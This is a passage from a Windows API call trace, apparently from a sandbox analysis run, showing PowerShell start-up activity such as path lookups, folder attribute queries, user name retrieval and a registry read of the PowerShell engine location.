ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.175] SetErrorMode (uMode=0x1) returned 0x1 [0256.175] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.175] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.175] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.176] SetErrorMode (uMode=0x1) returned 0x1 [0256.176] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.176] SetErrorMode (uMode=0x1) returned 0x1 [0256.176] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.176] SetErrorMode (uMode=0x1) returned 0x1 [0256.176] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.176] SetErrorMode (uMode=0x1) returned 0x1 [0256.176] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.176] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.177] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.177] SetErrorMode (uMode=0x1) returned 0x1 [0256.177] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0256.177] SetErrorMode (uMode=0x1) returned 0x1 [0256.177] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.177] SetErrorMode (uMode=0x1) returned 0x1 [0256.177] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0256.178] SetErrorMode (uMode=0x1) returned 0x1 [0256.178] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.178] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x16cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.178] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.178] SetErrorMode (uMode=0x1) returned 0x1 [0256.178] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.178] SetErrorMode (uMode=0x1) returned 0x1 [0256.178] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.178] SetErrorMode (uMode=0x1) returned 0x1 [0256.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.179] SetErrorMode (uMode=0x1) returned 0x1 [0256.179] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.179] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x16cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.179] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.179] SetErrorMode (uMode=0x1) returned 0x1 [0256.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.179] SetErrorMode (uMode=0x1) returned 0x1 [0256.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.180] SetErrorMode (uMode=0x1) returned 0x1 [0256.180] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.180] SetErrorMode (uMode=0x1) returned 0x1 [0256.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x16cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d090 | out: lpFileInformation=0x16d090*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.189] SetErrorMode (uMode=0x1) returned 0x1 [0256.424] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0256.424] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d3f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d3f8) returned 0x1 [0256.425] CoTaskMemFree (pv=0x1ba607f0) [0256.425] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0256.425] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d438 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d438) returned 1 [0256.426] CoTaskMemFree (pv=0x3220d0) [0256.426] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x318ee50*="Available", lpRawData=0x318ebe0) returned 1 [0256.427] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.428] CoTaskMemFree (pv=0x343650) [0256.429] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.429] CoTaskMemFree (pv=0x343650) [0256.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.465] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.465] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0256.465] CoTaskMemFree (pv=0x343650) [0256.465] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.465] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0256.465] CoTaskMemFree (pv=0x343650) [0256.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.470] GetCurrentProcessId () returned 0x988 [0256.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.479] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d418 | out: phkResult=0x16d418*=0x3a4) returned 0x0 [0256.479] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x0, lpcbData=0x16d398*=0x0 | out: lpType=0x16d39c*=0x1, lpData=0x0, lpcbData=0x16d398*=0x56) returned 0x0 [0256.479] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35840 [0256.479] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d36c, lpData=0x1ba35840, lpcbData=0x16d368*=0x56 | out: lpType=0x16d36c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d368*=0x56) returned 0x0 [0256.479] CoTaskMemFree (pv=0x1ba35840) [0256.479] RegCloseKey (hKey=0x3a4) returned 0x0 [0256.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0256.528] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.529] CoTaskMemFree (pv=0x343650) [0256.778] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.779] CoTaskMemFree (pv=0x343650) [0256.816] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.817] CoTaskMemFree (pv=0x343650) [0256.822] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.822] CoTaskMemFree (pv=0x343650) [0256.829] CoTaskMemAlloc 